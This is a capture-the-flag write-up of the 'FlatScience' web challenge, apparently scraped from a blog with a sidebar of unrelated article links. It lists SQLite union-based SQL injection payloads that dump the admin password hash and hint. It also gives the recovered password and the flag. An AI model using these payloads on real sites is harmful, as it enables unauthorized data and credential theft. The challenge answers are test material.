当前位置:网站首页>[attack and defense world web] difficulty four-star 12 point advanced question: flatscience
[attack and defense world web] difficulty four-star 12 point advanced question: flatscience
2022-07-23 21:01:00 【Black zone (rise)】
Two 、FlatScience
How to solve the problem :
1、 Understand the source code , Database Injection , encryption
The process :
I prefer to watch it first robots.txt file
/admin.php Interface
/login.php Interface
Ctrl+U Open source
Found out ?debug
Found new source code
Start the code audit
Discovery database is SQLite3( And MySQL There is a difference ,sqlite_master Relevant information is stored in the table
)type/name/tbl_name/rootpage/sql It records the information when the user creates the table
And the annotation is --
Also found the input usr Injection of being
There's no filtering , It can be spliced into the database for execution
Use bp Intercept , And inject
( stay bp In the injection )
Determine the number of fields
1' order by 3 --
( Report errors )
1' order by 2 --
( Echo normal )
So the number of fields is 2
Judge echo
1' union select 1,2 --
The echo bit is the second
check sql Fields in the table
CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29
After decoding
CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))
Field has :id name password hint
Construct query name
payload:
1' union select id, name from Users--
admin
Construct query password
payload:
1' union select id, password from Users--
3fab54a50e770d830c0416df817567662a9dc85c
Construct query hint
payload:
1' union select id, hint from Users--
my+fav+word+in+my+fav+paper%3F%21
After decoding
my+fav+word+in+my+fav+paper?!
We get the first data in the table
id=1
name=admin
password=3fab54a50e770d830c0416df817567662a9dc85c(MD5 Is message digest encryption , It may not work out )
hint=my+fav+word+in+my+fav+paper?!( It's in his paper )
Decrypted for
ThinJerboaSalz!
That word is Salz
ThinJerboaSalz! subtract Salz
So the password is ThinJerboa
stay /admin.php Page to login
flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
边栏推荐
- Jetson nano烧录踩坑记(一定可以解决你的问题)
- Car rental vehicle management system based on jsp+ssm+mysql car rental
- Cesium 键盘鼠标控制相机漫游(源码+原理讲解)
- Visual slam learning | basic chapter 01
- [PDD interview] analyze the activity of applications (cameras) in mobile phones
- LU_ Asr01 voice module usage
- 【着色器实现RoundWave圆形波纹效果_Shader效果第六篇】
- Unity解决动画不可用:The AnimationClip ‘XXX‘ used by the Animation component ‘XXX‘ must be marked as Legacy.
- The third slam Technology Forum - Professor wuyihong
- Go to the square for dinner
猜你喜欢
Day 12: continued day 11 (BGP related knowledge)
OOM机制
Read the five flow indicators of R & D efficiency insight
支付宝常用接口统一封装,可直接支付参数使用(适用于H5、PC、APP)
Improving Performance with Explicit Rendering(通过显式渲染提高性能)
【创建 Birthday Card 应用】
![[wechat applet] do you know about applet development?](/img/3d/da58255aeb6bf6bc5021d988906bcc.png)
[wechat applet] do you know about applet development?
高数下|三重积分的计算1|高数叔|手写笔记
If the order is not paid within 30 minutes, it will be automatically cancelled
Addon plug-in 002 of CDR plug-in development - write an EXE program that can be run by double clicking in 1 minute
随机推荐
Understanding of signals
Now I don't know how to synchronize at all
Kubevela offline installation
Tropomi (sentinel 5p) data introduction and download method
使用高德地图JS API 2.0加载起点终点路径轨迹
Cesium knockout怎么用?
【攻防世界WEB】难度四星12分进阶题:FlatScience
LU_ASR01语音模块使用
[wechat applet] do you know about applet development?
CDR插件开发之Addon插件002 - 用1分钟编写一个可双击运行的EXE程序
When we talk about Chen Chunhua and Huawei, what are we talking about?
【Scratch画图100例】图46-scratch绘制花朵 少儿编程 scratch编程画图案例教程 考级比赛画图集训案例
Green-Tao 定理 (3): 反一致函数及其生成的 Sigma-代数
支付产品及其使用场景
支付宝常用接口统一封装,可直接支付参数使用(适用于H5、PC、APP)
Car rental vehicle management system based on jsp+ssm+mysql car rental
利用ENVI对TROPOMI(哨兵5P)数据预处理
"Pulse" to the future! Huawei cloud Mrs helps smooth migration to the cloud
OOM机制
221. 最大正方形 ●● & 1277. 统计全为 1 的正方形子矩阵 ●●